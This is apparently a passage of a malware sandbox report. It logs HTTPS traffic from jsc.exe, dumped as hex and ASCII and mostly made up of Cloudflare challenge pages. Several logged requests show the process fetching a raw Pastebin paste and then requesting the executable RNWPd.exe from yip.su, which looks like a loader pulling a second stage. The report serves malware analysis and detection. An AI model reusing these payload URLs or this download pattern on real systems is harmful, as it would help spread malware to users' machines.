                                    Data Ascii: pper{align-items:center;display:flex;flex:1;flex-direction:column}.font-red{color:#b20f03}.spacer{margin:2rem 0}.h1{font-size:2.5rem;font-weight:500;line-height:3.75rem}.h2{font-weight:500}.core-msg,.h2{font-size:1.5rem;line-height:2.25rem}.body-text,.cor
                                    2024-08-17 22:08:17 UTC1369INData Raw: 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 67 64 6d 6c 6c 64 30 4a 76 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e
                                    Data Ascii: IgZmlsbD0ibm9uZSIgdmlld0JveD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuN
                                    2024-08-17 22:08:17 UTC1369INData Raw: 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6c 75 6d 6e 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 32 72 65 6d 7d 2e 63 6c 65 61 72 66 69 78 20 2e 63 6f 6c 75 6d 6e 7b 66 6c 6f 61 74 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 61 75 74 6f 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 6b 65 65 70 2d 61 6c 6c 7d 2e 7a 6f 6e 65 2d 6e 61 6d 65 2d 74 69 74 6c 65 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 7d 2e 6c 6f 61 64 69 6e 67 2d 73 70 69 6e 6e 65 72 7b 68 65 69 67 68 74 3a 37 36 2e 33 39 31 70 78 7d 2e 6c 64 73 2d 72 69 6e 67 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 6c 64 73 2d 72 69 6e 67 2c 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 7b 68 65 69
                                    Data Ascii: ign:center}.column{padding-bottom:2rem}.clearfix .column{float:none;padding:0;width:auto;word-break:keep-all}.zone-name-title{margin-bottom:1rem}}.loading-spinner{height:76.391px}.lds-ring{display:inline-block;position:relative}.lds-ring,.lds-ring div{hei
                                    2024-08-17 22:08:17 UTC1369INData Raw: 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 76 49 64 3a 20 27 33 27 2c 63 5a 6f 6e 65 3a 20 22 79 69 70 2e 73 75 22 2c 63 54 79 70 65 3a 20 27 6d 61 6e 61 67 65 64 27 2c 63 4e 6f 75 6e 63 65 3a 20 27 39 32 34 34 31 27 2c 63 52 61 79 3a 20 27 38 62 34 63 66 62 35 64 61 64 33 62 34 32 63 32 27 2c 63 48 61 73 68 3a 20 27 38 32 37 30 66 36 33 30 30 30 65 65 34 31 35 27 2c 63 55 50 4d 44 54 6b 3a 20 22 5c 2f 52 4e 57 50 64 2e 65 78 65 3f 5f 5f 63 66 5f 63 68 6c 5f 74 6b 3d 56 44 68 6c 68 52 7a 61 6b 42 73 37 42 34 72 33 59 32 4e 46 77 65 63 61 49 36 79 58 46 6d 6e 69 38 30 34 7a 41 53 4d 4f 66 7a 30 2d 31 37 32 33 39 33 32 34 39 37 2d 30 2e 30 2e 31 2e 31 2d 34 31 33 37 22 2c 63 46 50 57 76 3a 20 27 67 27 2c 63 54 54 69 6d
                                    Data Ascii: ion(){window._cf_chl_opt={cvId: '3',cZone: "yip.su",cType: 'managed',cNounce: '92441',cRay: '8b4cfb5dad3b42c2',cHash: '8270f63000ee415',cUPMDTk: "\/RNWPd.exe?__cf_chl_tk=VDhlhRzakBs7B4r3Y2NFwecaI6yXFmni804zASMOfz0-1723932497-0.0.1.1-4137",cFPWv: 'g',cTTim
                                    2024-08-17 22:08:17 UTC1369INData Raw: 62 75 58 63 79 6f 76 70 41 46 77 44 56 76 76 77 48 36 4e 34 69 39 55 52 53 36 50 75 6e 33 48 6e 32 31 63 77 6b 7a 72 78 71 59 46 33 5a 76 71 59 43 6a 6d 79 4c 47 58 51 51 79 70 79 63 77 58 47 49 72 59 31 4e 79 42 46 76 54 78 39 58 62 4e 6d 44 55 33 4b 64 56 42 77 6d 4d 58 56 6d 6c 4c 4f 4e 32 5a 6f 41 4c 70 75 46 51 6b 57 57 77 6a 66 5f 58 6b 56 48 48 6d 4a 67 4c 37 35 35 73 6d 6e 71 56 48 6b 68 41 78 4a 5a 32 45 76 34 57 77 30 71 48 35 36 33 48 66 48 6b 36 55 6a 58 57 56 42 5f 7a 4e 6f 58 66 34 56 53 47 48 47 4a 55 38 47 63 43 6c 6a 67 4e 32 64 6a 68 56 7a 5f 4b 6e 4f 72 4f 43 76 37 76 50 58 42 36 6e 32 41 4d 50 4e 38 4a 4f 50 69 46 4b 73 44 73 61 35 32 75 56 36 6d 61 62 43 72 73 4d 64 6b 54 5f 63 72 66 4c 6e 76 2e 72 73 33 70 6e 42 6d 70 38 37 62 6e 2e
                                    Data Ascii: buXcyovpAFwDVvvwH6N4i9URS6Pun3Hn21cwkzrxqYF3ZvqYCjmyLGXQQypycwXGIrY1NyBFvTx9XbNmDU3KdVBwmMXVmlLON2ZoALpuFQkWWwjf_XkVHHmJgL755smnqVHkhAxJZ2Ev4Ww0qH563HfHk6UjXWVB_zNoXf4VSGHGJU8GcCljgN2djhVz_KnOrOCv7vPXB6n2AMPN8JOPiFKsDsa52uV6mabCrsMdkT_crfLnv.rs3pnBmp87bn.


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    6192.168.2.549728104.20.4.2354437248C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-17 22:08:22 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                                    Host: pastebin.com
                                    Connection: Keep-Alive
                                    2024-08-17 22:08:22 UTC222INHTTP/1.1 200 OK
                                    Date: Sat, 17 Aug 2024 22:08:22 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    X-Frame-Options: SAMEORIGIN
                                    Server: cloudflare
                                    CF-RAY: 8b4cfb7d6a9c43a9-EWR
                                    2024-08-17 22:08:22 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                    Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                    2024-08-17 22:08:22 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                                    Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                                    2024-08-17 22:08:22 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                                    Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                                    2024-08-17 22:08:22 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                                    Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                                    2024-08-17 22:08:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    7192.168.2.549729188.114.96.34437248C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-17 22:08:23 UTC65OUTGET /RNWPd.exe HTTP/1.1
                                    Host: yip.su
                                    Connection: Keep-Alive
                                    2024-08-17 22:08:23 UTC1285INHTTP/1.1 403 Forbidden
                                    Date: Sat, 17 Aug 2024 22:08:23 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Cross-Origin-Embedder-Policy: require-corp
                                    Cross-Origin-Opener-Policy: same-origin
                                    Cross-Origin-Resource-Policy: same-origin
                                    Origin-Agent-Cluster: ?1
                                    Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                    Referrer-Policy: same-origin
                                    X-Content-Options: nosniff
                                    X-Frame-Options: SAMEORIGIN
                                    cf-mitigated: challenge
                                    2024-08-17 22:08:23 UTC689INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 42 58 4b 55 5a 52 4a 47 30 45 53 42 74 46 67 52 56 53 51 35 2b 73 70 43 45 36 39 53 74 73 59 33 66 57 31 65 75 7a 57 57 2b 50 70 49 5a 70 5a 48 2f 6c 46 4d 47 43 55 6a 6c 49 39 67 66 65 51 32 45 42 4b 4d 50 31 78 69 30 6f 43 66 39 4b 54 71 61 56 66 49 7a 32 57 70 56 75 41 35 58 33 5a 61 64 4b 5a 6f 48 41 30 39 62 42 38 3d 24 78 54 47 44 50 61 48 37 42 31 64 58 72 4f 57 65 50 42 71 34 2b 41 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20
                                    Data Ascii: cf-chl-out: BXKUZRJG0ESBtFgRVSQ5+spCE69StsY3fW1euzWW+PpIZpZH/lFMGCUjlI9gfeQ2EBKMP1xi0oCf9KTqaVfIz2WpVuA5X3ZadKZoHA09bB8=$xTGDPaH7B1dXrOWePBq4+A==Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires:
                                    2024-08-17 22:08:23 UTC1369INData Raw: 33 64 65 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d
                                    Data Ascii: 3de7<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
                                    2024-08-17 22:08:23 UTC1369INData Raw: 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76 63 6d 63 76 4d 6a 41 77 4d 43 39 7a 64 6d 63 69 49 48 64 70 5a 48 52 6f 50 53 49 7a 4d 69 49 67 61 47 56 70 5a 32 68 30 50 53 49 7a 4d 69 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 2b 50 48 42 68 64 47 67 67 5a 6d 6c 73 62 44 30 69 49 30 49 79 4d 45 59 77 4d 79 49 67 5a 44 30 69 54 54 45 32 49 44 4e 68 4d 54 4d 67 4d 54 4d 67 4d 43 41 78 49 44 41 67 4d
                                    Data Ascii: 0xLjQwNXoiLz48L3N2Zz4=)}body #challenge-error-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0ibm9uZSI+PHBhdGggZmlsbD0iI0IyMEYwMyIgZD0iTTE2IDNhMTMgMTMgMCAxIDAgM
                                    2024-08-17 22:08:23 UTC1369INData Raw: 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 44 6c 6b 4f 57 51 35 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41 35 4c 6a 51 35 4e 53 30 35 4c 6a 59 74 4d 53 34 30 4d 69 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 2e 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64
                                    Data Ascii: DEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA5LjQ5NS05LjYtMS40Mi0xLjQwNXoiLz48L3N2Zz4=)}body.dark #challenge-error-text{background
                                    2024-08-17 22:08:23 UTC1369INData Raw: 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41
                                    Data Ascii: eD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA
                                    2024-08-17 22:08:23 UTC1369INData Raw: 70 70 65 72 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 3a 31 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 66 6f 6e 74 2d 72 65 64 7b 63 6f 6c 6f 72 3a 23 62 32 30 66 30 33 7d 2e 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 3a 32 72 65 6d 20 30 7d 2e 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 2e 37 35 72 65 6d 7d 2e 68 32 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 7d 2e 63 6f 72 65 2d 6d 73 67 2c 2e 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 32 35 72 65 6d 7d 2e 62 6f 64 79 2d 74 65 78 74 2c 2e 63 6f 72
                                    Data Ascii: pper{align-items:center;display:flex;flex:1;flex-direction:column}.font-red{color:#b20f03}.spacer{margin:2rem 0}.h1{font-size:2.5rem;font-weight:500;line-height:3.75rem}.h2{font-weight:500}.core-msg,.h2{font-size:1.5rem;line-height:2.25rem}.body-text,.cor
                                    2024-08-17 22:08:23 UTC1369INData Raw: 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 67 64 6d 6c 6c 64 30 4a 76 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e
                                    Data Ascii: IgZmlsbD0ibm9uZSIgdmlld0JveD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuN
                                    2024-08-17 22:08:23 UTC1369INData Raw: 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6c 75 6d 6e 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 32 72 65 6d 7d 2e 63 6c 65 61 72 66 69 78 20 2e 63 6f 6c 75 6d 6e 7b 66 6c 6f 61 74 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 61 75 74 6f 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 6b 65 65 70 2d 61 6c 6c 7d 2e 7a 6f 6e 65 2d 6e 61 6d 65 2d 74 69 74 6c 65 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 7d 2e 6c 6f 61 64 69 6e 67 2d 73 70 69 6e 6e 65 72 7b 68 65 69 67 68 74 3a 37 36 2e 33 39 31 70 78 7d 2e 6c 64 73 2d 72 69 6e 67 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 6c 64 73 2d 72 69 6e 67 2c 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 7b 68 65 69
                                    Data Ascii: ign:center}.column{padding-bottom:2rem}.clearfix .column{float:none;padding:0;width:auto;word-break:keep-all}.zone-name-title{margin-bottom:1rem}}.loading-spinner{height:76.391px}.lds-ring{display:inline-block;position:relative}.lds-ring,.lds-ring div{hei
                                    2024-08-17 22:08:23 UTC1369INData Raw: 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 76 49 64 3a 20 27 33 27 2c 63 5a 6f 6e 65 3a 20 22 79 69 70 2e 73 75 22 2c 63 54 79 70 65 3a 20 27 6d 61 6e 61 67 65 64 27 2c 63 4e 6f 75 6e 63 65 3a 20 27 39 32 36 35 34 27 2c 63 52 61 79 3a 20 27 38 62 34 63 66 62 38 31 33 64 62 37 34 31 62 34 27 2c 63 48 61 73 68 3a 20 27 64 36 63 63 39 34 39 30 30 61 31 32 36 66 31 27 2c 63 55 50 4d 44 54 6b 3a 20 22 5c 2f 52 4e 57 50 64 2e 65 78 65 3f 5f 5f 63 66 5f 63 68 6c 5f 74 6b 3d 76 54 78 38 4f 69 30 57 5a 41 78 4b 65 73 4a 68 2e 57 62 47 76 35 36 37 45 61 4f 6e 49 79 74 79 30 6b 6f 70 4d 33 6b 47 49 39 34 2d 31 37 32 33 39 33 32 35 30 33 2d 30 2e 30 2e 31 2e 31 2d 34 31 31 36 22 2c 63 46 50 57 76 3a 20 27 67 27 2c 63 54 54 69 6d
